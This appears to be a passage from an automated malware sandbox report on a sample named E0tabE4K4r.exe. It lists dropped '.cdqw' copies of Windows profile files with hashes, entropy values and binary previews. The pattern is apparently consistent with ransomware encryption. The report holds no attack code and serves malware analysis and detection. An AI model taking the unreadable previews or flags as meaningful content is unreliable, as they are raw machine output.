                                                                                                                                                  Preview:...S.P..W..D..c.&.>... ..O.k..|.j.5L..2.......U.. ...."{?.M........O!@V.pR...W.~.....\FR.....~..=.$...{..X..!DM......).....:K.8.Q..%.t.m.....A;E....&...Y.06.fg...._.}.iaV....N.&EO3.. .....}.].Ff.g...p..u...VBr.a\r.,.,.)...9.jv..Xc....v...h4.<..?V..m.;.9%.Sj.............aEz.R.....e....:B."...F.{r.*......{..........(D..z.. ..@.6....<..e..5.....F?:..~)N../.p8..Xyuv.1Vr*...I..3...J^..ei..v..&..y\..C9;......j.X+o..Jlq..,..$.dc.-.z..G....." 6..k...9..u..G....>..D.a.....d.D.Q....Y.^..>.q=g......q..Bp[..hHJp....u......&}Ub.U.......jM..I........l..-.Q'........c.f>6.......I<..k.........W...-T...2~....x..W..{....W...l.^.c>...y. ..`.......:6...y.....~...u..g.O.b...........ZIM3yZ..2...{.`S..LA.<[..J\....=A.V!..U. .V....!.["~t.y...?.....g...0.......h....oDm.x..9..Q;Gi...!+'....=D.{-+J<..6+.....y.J..fp..>..Q.Fm.Y@..}..~i..\.WN5:/.!..,a.l&..nasve33h!R./......Y.O+tf......7Ox.Qj...T.......B@|.w..Y....w..n.......Ev..N..f.....`..R.s...d.G.Va..$)./.[.W

                                                                                                                                                  C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.30272917135481187
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Oztxn2blSWVgurEVGv3p8dfxp8RojLsTPqjxW0lKPDl/2bz:OpxCgurYGv0r8R7TP0EDlcz
                                                                                                                                                  MD5:F3F2AA44CF5B12D2452E364D855C4BA3
                                                                                                                                                  SHA1:73ED52F13DC8F0A14B30BCC47F568155ADD916E6
                                                                                                                                                  SHA-256:27CDEE739A7285B6FAA76B65C5C55F937353919047B5BF106090E61FD7719825
                                                                                                                                                  SHA-512:8B7F80BF991FF23A761A5ECD6DB598D19CE37C53634658E1A19913F77ADA732E1407D2238C33104F9CF58808C321F4530468EB8512D4A42E783357E6C2713422
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......P.....W......isr]1S....|.....a.4....n......,k..{f....-. h:.......U.[.:..Z....yG.......4.{.Wv.I=.m.%J=f|}B.Ij.g......{..5.?=.>..1Vmab@.q.K.S....Ah.L..E0.C...I.....g.......m...0&.o.NE.32P/....cEZ..}.u_jXC...Uw......M/.'.d}<...i...U..xs+....M....{.E....6.'......"..*^..O6C..W.}./.R..Gqu.6.O2Tg....3k.c#...\.+..7..........V....B.VK..FW..6]Q.[U.N......rz..|'t..d..1D..2.Ar.*{.H......Z.%,3..$...r.... .{.aW3..].v....L...[".s.`.H^vt.....q+...y...y.....ha(.0.......R.i.f*....U.o..\..8...N.....\.:.h*.CSI.9...`...x&.1.8w.}......'.....s......9..8.......5A.8.....V..@c..T..;(......?`!a...."[.(....PSP#t...x.R.n.[..&Ph...Y}#..P....q.b........4.....Xy....g.a9.;\'..f....Q._.|].......e{W....g.....A.....w......K[A..bl....!..$|..7>.i...o...?.sE.gP.3o.q.C.\...z.@6.wLV93....+"B;V.E.A..n.P....m4^...B...a....E.nu../.`.w........X.6F...f...2k....>..V.}..0.Xr.H....h...G.OpYN$.&..g5...R..>q.....|..w..0 .....S."-..... '.*.c...3....q.+..k.".W...u.N}.q.+.1..k...

                                                                                                                                                  C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49486
                                                                                                                                                  Entropy (8bit):7.996574219633321
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:5R/gwP5d6KnutszLXyjXaBgY0mA9oMNG1smCwqZqbcgJH0ujtdC96Fbaii:wwBdbysz+mpA9t4sFwqZicgH0Gtdbsii
                                                                                                                                                  MD5:2E64F508533B1C818B02B67A924A3DEF
                                                                                                                                                  SHA1:05E3E829980802A3AF01079377800325F2889EBB
                                                                                                                                                  SHA-256:0CE0EC369DECA989CE715148263D2C97839C38EC898B8AC0E0AF8F3BF63B446D
                                                                                                                                                  SHA-512:B06FFC9235CBB61DB694556C1CCE6B24953D47D5C13B53B31EC8CFCC9400AE47C798728BFFB6F568463B8CB001748E7857EA07F570B91D400614E8A8CE3E7891
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitN......U.......TM.......C9E.71....n...'....;-..e...Y0.]...F8..".km......~.].*......}!. .p!...Sg..5!..*`...L.V..>.R..5i..y42....c.W+..E..#..pQ.......y\.. .e.>..W.M..Z..v.p1O......+.~.w.6...\....$.......a.yF.7..".u.L.Y.R.[).e....5J.O..K...Yy.:.b.EzO..%.grL..W..q6...[.?;D....,4!.)r4....j......:...0..!kh...W...JB.Q(T.w.U.e..../%.Ud.6.cp.!-H>.(z.W.v-'.2.u.M......~..+...+V.l...h....."....{..0.\<........#*d..\0t...6v5..$..Aq...../.dg7..*7.9)....`.,(A7..x.......%..s....u......M%=d....".^@.&....04....9H..1...?.B]...._$....... ...7...Xa...F.n.......c.Mi.D...Q..../)c....,....8...@.R..'..;.-...Y....$.>....}_`\.\..d....rT..]......]N..lN....S.6na..b0}..........#.0q.4.v...[Z.. ,.DT...;y.-.N...V......|D/....e.T.x..t......u..._..n&.F.PJ..<.p.u....\...."....{.F.,N.i.`...c.....D......H?u.....$...%...\.J.h...;.gz{.!.6aZ.....N.....gj.*E.a.....7*..v..]j..?...x.k...C.h....k........<~.....sN\.Jm.v.E..I.2.>......%+7..#..............H.rI....2..Q... ...

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):354
                                                                                                                                                  Entropy (8bit):7.245585883509604
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:QpVj5P6HVIGI9y2rmIKo4ftAcWGolZjz9xzQXSf6okXIJJbAGYqMQPqinIS1WdNX:QpnyHVIh86mIz4fxolPPj+UqzSUdNciD
                                                                                                                                                  MD5:7273949855BE3F64DB8E4801A45CF7A0
                                                                                                                                                  SHA1:0FF1D9B79FB5FFB264D00249E4CC571032772715
                                                                                                                                                  SHA-256:C77F4500225AA1982B00CA7AC3600FB94B582D03A12DCE0C7EA81C42575E9C62
                                                                                                                                                  SHA-512:6C618B9F47DEA38C982E0C09994C1016F3FF7633569F274E7F9FC12844E4E719AA13271657FD50979AB97D0BD0F20D7FA05D274453203E612D25F1D593A97AF1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1,"fuV/5..Y"PT....o.^..I...7.......$v..b......K...%.._..........f7.h.&>V~I.T....7.r.ub..A..7P:..M...JC.7V3:...g..D.eK....d....M/.....-.f.J....i{....[...y?..[........'.{......iz........9..1..g.}8$.......vP_..4.,..Y.B.$>AH..]3n[.f....n..,.~+..\(..)n{..l......".vfmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1554
                                                                                                                                                  Entropy (8bit):7.859940349708868
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8W+ONX29mo08ZgcUwNtgMZfZgG8QLKGl8/06OSInZky8Yd/P9AtYvSayNf/mUjGw:C+2708Z9LgCRgDcZlw68tYRy9FhD
                                                                                                                                                  MD5:DACC39E83CF448A8B5FD27EE84AEBF72
                                                                                                                                                  SHA1:1ADB819F3A4303970AE198334695DD568F550D11
                                                                                                                                                  SHA-256:807E9CE51555A964D916340B34A3319DAB7D262233D6BE440036C5D434A04B69
                                                                                                                                                  SHA-512:999E02C82087142EF85EEFE8EA5207736EA97538FE782526C27244D2B50176E3D704CD74C43E03C5D179B45E3A565D42AEC3EA8A7491117D33BEDEE0C5C0EFEC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1,"fu....+e.}(!H.^;.W.J..N.7.>..p.\.....^d.Wc.7...O..}w..b.....gI..^.A...c.......*..k.W\x...i...w..Y.1T.J...D.......o.R..}R.......Mj...........^..*.Zd.E.&.Y.zm.%.|.o.x....}x.p.#...5.........|,.p.g..>S.5En...xl'.2..j....E..9...\N.._..\.Y...G.0L.zF.o.....*S.....51...\..Di.M4.w../}$..2.Y.a.!aMe.].l.......w...j.....Q...n....+........5W..1.6..:....J...|+.....$........k,x"...wE..y2q5..R\`..8.Fi......p.....p.....As..u0Q.'.P...e....NO]O....}I...6##I........D...c..1....X....$.\...[8.c..2...X.M...s,.JWR]7.3.6....u..o..>....&......c.FS...-.4X.Q...E..D..\.u..$..L.....:j..d.K.7..r..k..O.wH...f<....R......pE.D.S.>T3..bX./.....q.W.O.i!.q..)..)....)\....Z. ...c1kJ......%}.........wwXMm]4.mB.D...M.B._..5HS].....d....^.^.u...R\...O.R.B@].{...\}"k.......-pf..k..O..Es2....f..n.6.].0.;..x..0?.z..a..k....=...2..Z.S..v...AA#..;....X):...I.h..@;.......U...u.7bNO.T......?.y......TQ]....1;...F.cjS<U-./6.....i.K...9...w.G_..T. "^...........J......-..K.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\LocalBridge.exe.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1952
                                                                                                                                                  Entropy (8bit):7.901607376039365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:5J6h10cgWl7naJkkCwCWjWVORyqU6X7VzS4bD:5J6b22naXeWjWoyG7tS+
                                                                                                                                                  MD5:A297DBC9B435A1527BC68505F52871EB
                                                                                                                                                  SHA1:FD742E8A03015B37D5EF3640B04BB53E3BCBB213
                                                                                                                                                  SHA-256:739448D8F87FC39478D29C4FB43656B2EAEE2CFA52FF123BE3C053A17992A7A8
                                                                                                                                                  SHA-512:D2A5A95C274F1DD19ACEC9B5C023F2FC679155ABA2360449E533F75B647D51892CB2CA7A68CAC214EF0D23026505B67DD2716467F046141F4511402B42D848D2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1,"fu..P....0^.....O.K....8.{...;..)..[...I..c.[..*.!.,-...<.>xy.e...L.}g.F.F.l)Xvu.3$.G%.R....1._..........!8<eF.n.!{.R.<..&.g._.!.W.T..G.......X.r8...3.|..E .qD..'.7ip...|..a.u.^o.y].p'`{.bO....:aqe.o<.............8......+...;...+...'e...h.*.w..R`DV..ne.;.M.1..q..h."...9..o.u..e.Y..{!w.am.c..0>...\....Q..%@8........Jx...=d.....w......#c.......7....F....d _...y.X......p..:...,....PE..L(...?.Wa...0^......@.hM....y.).[....@..\9.v..2...S4....D.e..l.4....}.4...;s.{Y........C......am...../>I.p.(.Y..(...t@h.l... N^A............_.4 B..Bl.V7a.HO.s.*.!...i..D.x.....I.e..@..!fnBS$.i$>..&..?....f.V.6.L...K...z;.XD...!....u."K.wd.Ad...zE..U.Pp..T.r%.&@.....B...W....b..G*.....q?.....7.Q..R.....i.0.....G.vm:.......?fSZM@.?..[..,.d..q....;W.}....9..}.....r.h.>..ZCnr...)......%.&.>.....O.M4..Ng..Y.7..y.7.,Z.->4.... L......:.Y.#........\.+........r=../..S..bo D...Q.....4......\..[R..Q0....*..E.S....N..ZW..U5Y......R....haRLE...U2L.....J..A.^.p...e?c....8.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\FontCache\4\CatalogCacheMetaData.xml.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2203
                                                                                                                                                  Entropy (8bit):7.9077049443310585
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:tEPLIAwKbl7H3Ls8Kgl36igpS/46RDm53SRXSejDhMNaDuD:tETIAwg7A8Kq36ToBQ3YNDS
                                                                                                                                                  MD5:7780FBC9FE9671579453E45DFB504022
                                                                                                                                                  SHA1:06C2E73DD7492D82A2F87237162FED237B071D14
                                                                                                                                                  SHA-256:CDE26220D79817D5BA947D6D9F91EEADDC0911CBF1F5629CEAADA056AAD931E2
                                                                                                                                                  SHA-512:0A516BD593018502CB5162110D44AA4D78F761350487667B5A88BB82D2EA3FB06B36D3B0FF92356AEEE4B67D8AADCD7E92D85822D24B4723EA83E160FBA024B2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.B.......(...P,....H.l.......u.p..........:...H.C.G.rAUS...e.A..k..NF...vQ...v.e4.........;._d.0....X.?..i.O...u.I..9L.[..y.....z.....+.h..V.....-....F..LT.Mb..n.R.p.....^.1*.....q.N82......._6.RL..s\...x.D.....-.....U......../....j.Va... Z6G....L?..9.S.51`.*.F.|t^....U+.g...n.c.w.u:.}=....F.Oe.......D..M.....`...I.D..=.2....]m.l.Z0a..1..QE&|9..39...9r@..%|....h....K.....g..tr.I..,..[.....$.B....=..b..Q5...mY....fm..+........).K..J,..a......M.|-.Y,.5..Y..e..#.....-..]@.?...2.-.I..2.m......SL`.D(.W..#.2..x.....{.~.*..%....u.4..c...<.hT..?.F!;Rv.~.....M.....S...$P..~.y...T.......k......r....m....j.;t...v..M.:...8A..]..wFn..'Y........nY....?Lf....Fw..O..Sn.L.L.k/.L}.G....U%0.|0p..zB..j.Yj......h..}...6N.HHa...p.).=...\r=..f..a.../6..[m)0..Z..:.~!.......! ...d.,.B....>o,5.D.../rm.}qd...D.o9...|.a o.I2....._......C.y2J ...Y...3..9~..m.+..... .y*.*.n..i*.......dUF...r`..N.N..-...\....&..F.q>.m..Z/.]...f9.~I...1...X7O./-....J.*....

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.chk.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.9777193590283915
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:dLyo/wPeKYF6hnQOhKv+FsK+LiodCtKnLEjAgb23DhZHk:d3tshQOhYRJnwjN6pk
                                                                                                                                                  MD5:068B36AEE40655C1A59159F157EDFB88
                                                                                                                                                  SHA1:7557C43FC3189A05058DF03C3CE75912B5682E3A
                                                                                                                                                  SHA-256:A81A1B333BFEC594F88F141257A14ED16559E91304822C8B511B1642BEF2D49E
                                                                                                                                                  SHA-512:58BAC044980B406CBFF68C7688AD683F4FB99035478862169F7A462BC439EBA7F7ACBF833F9DA6A33AE52414B638E5316FEDA406C3E258FA60756E167788B4AB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:".....?@..!...>...wv].G.:..`y..D..[.....cC(..<[l$S...T............F.4...|.......U.Cn.}... R*.J19.).,0`........e....**.U\..U.zn.VIZ....Bi.(.k..p.{...6@.Ra...8V>.....V...........8...x.I%..c....=C[.N.....R..y....Na.l..."....2..#b..2m...$ Z.D..N.....9...$...............8..C.]uv..-....4..:.G.^k.H.TI6.....2.j........W.,.".K]....K.0..T...9...-...6A..A..5..B_....L.b6....B...a..f.H^E..9@...........d.w...!.........Ll.?.q..&Hb..5..I..'!............s#.{.....W..3...Y.;..{JAz.7e$..Y.Z.G.V..RK.4 ....Q........#.5^]..{.....(.JE.S/T...tW`r..!....G!..#<C%j4..2..Bv..X....p..<.{.Xla.c....Ce...2/..:.H'....Z...+.Z..a.zY.%...e./.......j.~.D...R>...+..a.e.+..#'e;F...5._...R6..Qq..x._...*/...c..!.H.v.E.|.....L}..9.....; 1g.r.{..B..d...@(]X%..X8.....V....t.fJ8...~W]0Nmk.sa...fOy......"%+.,..]l...so....f........K.Z]...uZ....i..#.o.A....mp%^..C.<...<..|0.X..."0y..;..>s9. LIV......$.K..V.m...-...b..o..&...+...x...otP.S.....r......=v...7.....U..O..o.....>..n,

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.953402704738034
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:UcQmiBtJ9RZ4zT/onJAWlSXeNJ/zpZVS/Cn:o7HZgT/oJTlseD/NLx
                                                                                                                                                  MD5:5B1079075E8A123DCB2C568A0D3CC0FF
                                                                                                                                                  SHA1:A1D82C3F5FB2C0E8FBBC337B3592215A0AE4E3F1
                                                                                                                                                  SHA-256:30A5EC197FD9AB0CF1C37B3C4DC393C679E6D29F4FFAFCCD3F28E711BA56E44C
                                                                                                                                                  SHA-512:7C0AE7FAFF97E0CBD007C14DAF0FE2B67D2FE105CF9BA64E971AF25A615482179F7C1BA5B7D8D43396194B31395230B8CBF40997344C9DD52A87D8B7C89BD72C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...~.]#..].?..v.6...a....k.%I.....B.S?.b.K..[....lih'ph.@.l2...g.WD8.4&^.*...L........`....k..w...,.......y~....d..&j/.R..QUCn.RA..B../....x:.aqd..0..A..B.a...,..~..tO.......S....p...g)eX..~..Ws&..S>.%.n.....Xt/..r......5.}#..8A._V.Q~}..4m{/6..9"fB.9...........Y......`,8?l....b;$..:.b......FT......'B.W./..M....n.N..N........T.9.z.B9B9....w.ge...Uge.a9..6^.@..8.6...M1..>.y..@.....8.t.A..N.."...<D,.........E..>..58."BP%r..........&......x.7eT..l..|..'."G{......K........K../.x...m"%....xbE..OH..Gq;.8...'@.>.\$lj2.#Ok..c...g.+l...kV..t,ID.\..+...........de../.8...`..f{....%.W~G..3p.H-...G.$+c...........$..%[....&?....#.F..*t}....n.......z~$I..)?..9F@?..;f...!...ji...(.U.,.`..O.h......L.s.8..a .PVi..q ;&...$.t.T......}k.S...L.2i....rh{..X...E...{..h.F..>..yW`<..O ..u.^..e.q..7.O*....y...;.r. .._f/.kn..J.9...nC.$.&hW...MN..&....(f.z..y..'A.E...6.9.*N0..4...Qh..l.!.\....M!.. Q......k...K.......v.=..bkZ..kl..l.a.Q:e........,,fO...

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.20745994679025
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:Kdn++D40llgABg31GHCYg6JK/I+N7CXglGD18aNlZRo58:KJ4IgYrJYbegI5hi58
                                                                                                                                                  MD5:8D95807C93E12CDDCCEFE004A282EB35
                                                                                                                                                  SHA1:354E548BB12F893A506D9C3370A9E5047CD0B338
                                                                                                                                                  SHA-256:DBED32A8640D86DCBFABFDD85C7037BFFD69564B6354FB46B7688F62EF2FAF31
                                                                                                                                                  SHA-512:A4F43C28E6C085AE7F98DC59AFE18E63A4C0E5609C3905EF4CC4C555686F625DDD31860731D1251C4958358AC5A96E278F25A753FD4AEC1B9E2E1CB83610BD72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.......b.-../.U...@..7..+.8<j....F`|..iUM...1.f..Y..oM.%j,...".r.......d'v..#.4...Q.xD.o...^*S.....y.....X..<.."9.. .....,....O...X#.{........$......`.}L&..3;he.o...zZ.........%.=7.{...T(.s.%..Z.\"9~M......c:~.........Q.....tJ....e.........]O0..+..T.f..>.k......0XN.@3GU..!.c.8YK.G.....y..S....C.$eM....4.q$.l+.....n.u.&.I...Fi^.......5y..e.D...w..8.J.......X..4.J.hn}.3.;.K....h..`.avX.dF...]....JK.z....eH.....V..a......<:lJ..p.\.j.....g......2....;}...[&...3....k>5.....Cs...3;...ha......98....0.....P..F..hLx..6zd.>].../Cz...@xQ-...|../B{.v,..5.@.+..r-........&JR.. ~..GZ....B....E.=jTP.....]Y7.r.*s..~.z.z..s..af...(d}.+~...}X...rG..?..HhF..[9J".t.'x@.....vL..Z.....h,......:5.x....F`JD.F.E...G]....V.>$X.J .Dd._D.-0.)W.]...EA.. g.i...}D.....fs....9ru8...N.5..4Y.8.NP.n.'..xk8.YfD..v...........gP.G.4......W"..G...2&..B.....L..,...d....E0R].C)mG.....Q.s.?..wh@S....$]m......\...*.zK.cb.....KM..t.$=...q,&y...U...Z...P..;E..$*....a.O........?....x%h

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.2080072248817677
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:+dvfyT78eqxoEwRFNzqVo+HlDZqTtQvmm2R9dHZJWvrwo63qqJtrx:+dvEVzqrlETivER5UDwxlJt1
                                                                                                                                                  MD5:4D96FF0CEAB7155021A897CE4AE569B7
                                                                                                                                                  SHA1:B8C62B356A9D1C90A342C0DCF74AF127CE8FAD6D
                                                                                                                                                  SHA-256:6FDFDF7ED00517DE22ED60B679A4F6529197EDCC0B59EC8C5535988D6812FF13
                                                                                                                                                  SHA-512:C227B5365E383DDBF5A7F8B90B03A6E3800BC58DC8DE6BE9155688A7488F7A9FC81D581A971FFD6DA79F69CD6C8D18C85ACBB89B4529FCA339CCE692E192E0A1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......n.=..3.Re...Q)<e".=j_........~.^]....g&(..XD....oRC..o..Y.'.....k....~.J....P..Y,...Vh.n.. Sg.Q8.0............E.....K*B.~){.5/}...%F........7.:.....3....P...........~...$#...di.....m ..e.g..ea.'. ....G'_j".h?7.1.`..a[...G..M.*.i.Ne.a.S.#..Tk<.......U.0 .?..!..P..7....aM..v..g.@..:[.....}.n......?P..W...T..(.......&...g....}.2D/wN...KqK...."s.mP~.P......&...~..pce...)...Ep(..7A.C..h...m.UM,...._.@....K@.;.t!...=.tf.q.16R..E.^&H]...a..]j!R....u..)cV......t..X......5.'.J...J..@.}.k.%f....[5.#Q~L\[1$..M&..N/4...7.V..$E8...7..5.Xw. .1..}7.+....,.0L..L...3@.?..+..=08.|..=...H.....<`.\..`A..Y..6..|...2.fC..,:........_3...o.[..s.A......J6 :.>...^H>...O.4&....iV..R..iFd, .x(H..X......X;mB...XxR./....`..5.3.f0.qE.i...Uf.\9ZG:5..L....K..9..{.._....*2..-..j.Bi..Q.zBU..0x...3...mc.L.1.A9j..F.^....A.RMu.TI...n.........t"':/..s].-"<\B..">./..2.,..u>..2..f.L.YQ...g...;.._..1hL.........x9../.G..."u}.5.U..`]n.Mh...$W....V...L.|.MeW....Z..G..U.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbtmp.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.2087727542363553
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:5c6Ml7tmGFuYEGTYHf+ddK7AHXOhrC0TzImNP:5c3l7Yk86dLXylzImNP
                                                                                                                                                  MD5:AF3FC4132B6410E3BECD82674470FA39
                                                                                                                                                  SHA1:B52326FE7DB390DC3CA49CEB109EBD656C57E695
                                                                                                                                                  SHA-256:CC9AA4449E72E077D080237B95565C4D2A8C75A968F1F4A87123F3D1B3CE0819
                                                                                                                                                  SHA-512:B92D37ED18B00B852F1BA661BCAE53C00EFB3D559FC9E79362B5F168CB09C28C118C480DEF6527F82AAAED8FC1BC1331D2C8D5A25EEB2500D929CEF986E1FE94
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....x./.hI.9..xIN=.sL.Q./k.......Q.+.n@Yp.,..b*...Z..&k}...A....[v..2..b~..|..@.H|.%...f.e'v....S7"..?z..k.5n....r..Y....+....v..........Ol...m....-M.p3t".....z.....U.j.. ../..d_vv..X'#^.....'.W..`....Zz..7.....Z..ju....].iL......g # ...Y...Upk......?..{..#5..d..Z.yX...........m.k.mO....X $...,.P0x=.q#..W.A....JD).(..s-.....v...`.3........JS.".{O..h&...J.....].O.Rp.u\..Hx.0gv.M...s...{n.qN}. ...(_n...).%&T.x..v./,.*.U4r....Q.....=.p....A..qt,..P.b..Q.}Y..>.B..2B..$..EY.@.h.V .8.qL.T...PO.....e-....[..9.f.s..z.x.n..c.k....8-^.^U..>0......S.._&yQ.d.. ...^....}H.x...3............V>_.......K..@Dv.......,`.[...W....<..H.k....N..UTe...G..Co}W.D..V0.1Y.>.5...y8...Z4..cA .:..AT..S....e..]..S..].8.bK.l....H.x..O.\......y.qs..C+.Z..9.P#9.._J.).....'=..l.N\7.....O|.&P.:. ...7#3./.....\.^.n.5...y......7Y...(.^..3..7F..@9>.^)f._!........*.!..;q....|.p``C....A..Q..hN..a..V...[.P.&.....MA...N...?a`..X=_..K.N.<!g.I..a.72..n....~..xw....Y..i

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3384
                                                                                                                                                  Entropy (8bit):7.9390200608069454
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:XSHZtbST7hwgwNu0TuEDWnRo5+05xEQZgGBWX0wdV9LnYDN6+kmUteK5KhIH8JD:sbSTIRD2CxVFqN7ebQoK5Kh9h
                                                                                                                                                  MD5:FA060D5FFFC258D74933B1F14E686E6C
                                                                                                                                                  SHA1:5262EA9C59DB0B9B27B864B6882FF3E6CD10ED32
                                                                                                                                                  SHA-256:554E111241C868CA7B11FD0E27E70DFC1542102E87DA14A36583BA31B756158A
                                                                                                                                                  SHA-512:596F6537EEBE093F2CC63BB8BC12C83244603ECCCCA1122C300E14E1D0A3E3287EB70867E58E5364F8B0A080A95C6CEA6A937D1F99C0EB0C17DA99D254BA94A7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml4.(RcCcl...=u!IJH.N+.t./.nd.h.i..V[T&...!.E.......w...@.U.N..([E.. P...z..?0.Lk<.%[w......|......$.wbO.....<.,...=4....N....t9.~1....0D.:#XS2.....>....B<.O.D..'l..g"c.,.o......<..O...............%..4....tC.j..Z.wT7y..1A?.<...L..]+..$N8...2m.`v......6..5.V>D..(.......n.r..dX..t.*..q.=%.\.....V...... cDa...^..[.;..f..mD..v..5E.Y.k.g.....V4.:....h..Vm...Du2Q..x..S.M*.:.o.....DQ.HD.3../,.K.*....;I..@.&."..[.+._._i].Dk...JpFg.8....v.....!4...Om.usK...+f.a.../..0...{]e].O/.x...%....N...k.r.NM+.2..zN7..u>.E.w..[:.H!E.K.E.+...B.....Vre..}j..FF..#6..[|..heT.).....Vp.....}..n......<H]O..c...t.0..7`N............/6R....-,....K.....3J.%....B` ........r.~......vq...Y.#..Z..!Dt..1.}.>.-(.$...tlEFQ:^...R.x...R.!.a.O..!.".iJ._(....+_..ak..-c...Y...p.+.5./.p!...ac..|.....t...u.....k.dC$a.z..`..0...d.3..y..x. ..O5..*.b....?..j....,ja...=u.B.K.J..+`.....$.2.....L.y......G....J.m....>e.z..:..ow.X 6W....u.!.$\...+.!v.Q.+...m...A...YI..[..D0.%.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6906
                                                                                                                                                  Entropy (8bit):7.974432508389135
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:dE+D91BWnUu38DqembPdM79rhMkNouzt+H5:+u9C3FeYMJdMkO2+Z
                                                                                                                                                  MD5:7AEFB422579BD9737BE29F0FBBFC9435
